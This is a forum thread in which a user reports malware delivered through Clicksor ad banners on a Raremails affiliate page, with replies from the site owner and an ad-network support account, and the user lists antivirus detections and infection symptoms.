Several months ago Raremails had clicksor banners on the aff pages. The clicksor banners had viruses inside them associated with a domain called especialads. I informed Anyyan of these viruses, he said he'd remove Clicksor when he reached payout, and he did. Then he put it back, and it still had the viruses. This time he got upset instead of removing it. Quietly, though, he did subsequently remove the banners after getting upset over his site being paused.

Then a few weeks ago, Anyyan put the Clicksor banners back on raremails. I soon established the especialads virus was still in there, so I wrote him a note to let him know. He did not reply and left the clicksor on there.

Tonight I hit a raremails aff page in a PTP page, my computer went all slow and the hard drive churned. I got suspicious/worried. Then my AVG popped up saying there was Virus Pakes on my computer.

It came from the Clicksor banner on the raremails aff page...


Another thing is that only one PO who I sent an abuse report to who had the Rare aff page in their PTP with the virus actually responded. It is impossible that I am the only one getting these banners with the viruses targeted solely to me as Anyyan seemed to try to imply. You don't get a choice about visiting Raremails aff pages like you do PTP pages, they are inside the PTP rotators so you could get them any time unexpectedly and as long as this Clicksor is on there and Clicksor do nothing to remove this channel for the virus spreaders all PTR members computers are at risk.

NB I did write to Clicksor as well as Raremails and got no reply from Clicksor either. There is also confirmation of the especialads viruses in malware forums stating and showing how it comes through Clicksor.

The one i didn't reply you was dated on Jul.17th and my baby born on 18th, i then had 7-10 off-work days and up until now my time's still limited.

Why big companies like Clicksor would let the "virus" run over months and months, if there's any? The banner is 468x60 and most popularly published.

Sorry, and yes, during the several months you'r still the only one that "caught" it, as far as i know.

Actually, i don't publish Clicksor on Raremails, i have it on a personal page of mine. Exactly last night, i just sent an admin message that a lot of improvements were scheduled in August on Raremails, including compeletely redoing the affiliate page.

No more troubles soon. Raremails will be one of the most popular affiliate page sites, again.

Thanks.

Congrats on your baby

Problem is you already knew Clicksor had a long term virus problem and you could have either not put it back or you could have tried to find out if the virus was still there rather than putting it up at a time when you weren't even able to check your emails for two weeks?



I don't understand why a big company like Clicksor would let a problem like this go on for so long, but they have been and are. There is not a question of IF there is a virus, I gave you a link before and in the email I sent to you to a good anti-malware forum where a professional malware hunter had documented one of these viruses coming through Clicksor. This is not just 'my' word, I have shown you the codes to prove it's there, I have shown you links to professionals saying it's there and with better proofs than I have.



And you're so welcome that I not only put my computer at risk over and over viewing your site, but I also spent the time to delve into the codes, research the issue and let you know about this about four times? How do you know I am the only one who has caught it? Who else would know where the virus came from if they caught it too? Others are catching it from the Clicksor banners, thre's a thread here where Longshanks got an AV notification of the especialads virus from a site running vastgate and clicksor is on one of the sites in vastgate. You can search the internet and see others getting this virus from the Clicksor banner. Your rare page is usually inside another PTP rotator, how many people who had been hit would let you know it might have been from your site? They're normally too busy trying to get rid of the virus or they 'might' hit the abuse report button on the main PTP site, but they don't normally write to the site inside the rotator. Then you have lots of PTR members using noscript today precisely because of sites like yours with viruses and extra webpages making them slow loading.

Michigander had an mvent warning a couple of weeks ago from a raremails page and you intimidated her into closing the thread. Was it this virus that set off the mvent, was it the other virus that the lady at the malware forum told me was in another banner? Some iframe less than 5 x 5 set off michigander's mvent and you were too busy saying how clean your site was to even investigate where it actually was. Just because the zero iframe code didn't show up for michigander doesn't mean it wasn't there.



Does it really make a difference if it is directly on raremails or on the page that is 'always' in the rotator? It's the raremails page that goes in the PTP rotators, that page that you have the clicksor on is more or less always the page in the rare iframe, it's a part of the page like your arm or leg is a part of you. It is the raremails page that people will understand that the virus is on regardless of which domain you technically have the banner on 'directly'.



It is very popular and that's the problem, because you don't seem to care about these viruses. Even in this post you haven't shown any contrition, you're just intimating that I am wrong or lying or that it's insignificant compared to how great your site is, and bad bad me for writing to you about the virus at a time that was inconvenient for you.

And you haven't even intimated that you might remove the Clicksor again...

Thanks for your congrats.

Please invoice your opinions along with other prossionals' to Clicksor support if possible, i assume their technical team would be able to help.

I didn't intimate any part is bad, you, me or Clicksor. You tell the experience of your end, i also do from my end, Clicksor do theirs.

Time will tell.

As I said, I have tried writing to Clicksor before, I assumed someone there might help, I was wrong. You might have more luck as a publisher if you take all the links and information I've given you and the information in the bluetack forums which is much better than mine, though they also need the information on this new virus which is different to the especialads problem.

Hi,

I am sincerely sorry about the inconvenience caused by this issue. In order for us to directly locate the ad campaign please PM me the IPs with which the ad was viewed with, Ad URL, Time of occurrence, and the Anti-Virus Program.

Your information is helpful for us.

Thank you for your cooperation!

Hi,

Please feel free to PM me if you see any suspicious ad on your site.

Thank you!

As requested I have sent PMs to Clicksor_CS with a lot of details of both viruses that were running in their banners. I was asked for an email address to be contacted at when the issues have been sorted out by their team. As yet no email has been received and at least one of these viruses is still being very busy.

Last week when my FF was upgraded to FF3 my adblock stopped working and I was getting this virus daily. It was very unpleasant, I had to keep running AV scan after scan and for days was too scared to do my online shopping or pay bills because there were still parts of this virus stuck on my computer.

This is the current problem running from the domain hostzone2.h.advra.net (the same one in the code of the first post of this thread!) Instead of getting removed, they're just updating the viruses in that while Clicksor continue to run the infected "ads".

That loads flash and scripts - this is the part I believe to be carrying the actual virus


I grabbed that from the JS of the flash banner from firebug as the other codes are blocked now I have a working adblockplus which is now preventing the virus alert as it should.

This is the URL for that JS coding where that iframe code can be seen


I believe anyone with enough technical expertise will be able to confirm everything said here with this information.

The main thing is this is still a problem that has not yet been fully addressed by Clicksor. Plus each time I got that virus it was dropping a file a.exe into the system32 folder, but the name of the virus caught changed almost every time AVG caught it!

These are some of the results that turned up in AVG, I believe all of them were this same source, from the 23rd July onwards.
Virus Packes
Trojan Horse SHeur.CEWA
Trojan Horse SHeur.CNFP
Trojan Horse Dropper.Bravix.A
Possibly also Trojan Horse Downloader.Tiny.H
Possibly also Trojan Horse Generic10.ACRY

I've already sent Clicksor what I think is enough codes to show where the banner is on their site and that it is infected with trojans. I will save the full JS of that script file on my PC as I don't think it's of use to anyone but just to keep it for reference in case anyone does want it.

Just to make it clear, I do not have a problem with Anyyan or his sites (Fusionmails and Raremails) My only issue is with wanting the viruses removed. I was not the only one getting them on the internet, but apparently I am the only one in PTR getting them and I apologise profusely to Anyyan for any inconvenience caused by this situation. I am not in any way saying Anyyan runs bad sites, I have simply been very frustrated with these viruses and have posted as much information as I could to show what I was seeing and to show they were viruses and where they were. This does not imply that anyone else is going to get these viruses, my sincere wish is that no one else is affected.


title edited per request - sophie

Fresh infection today from a new domain but same Trojan. This time AVG has not picked it up. VirusTotal has 7 of 36 AVs recognising the file a.exe as malicious... so anyone who may have been exposed to this is recommended to do some scanning just in case.

http://www.virustotal.com/analisis/da464a8...b32ee3e5d186ab1

details




You get a short browser freeze when you hit the file, but if your antivirus doesn't alert you, you wouldn't otherwise immediately know you've been infected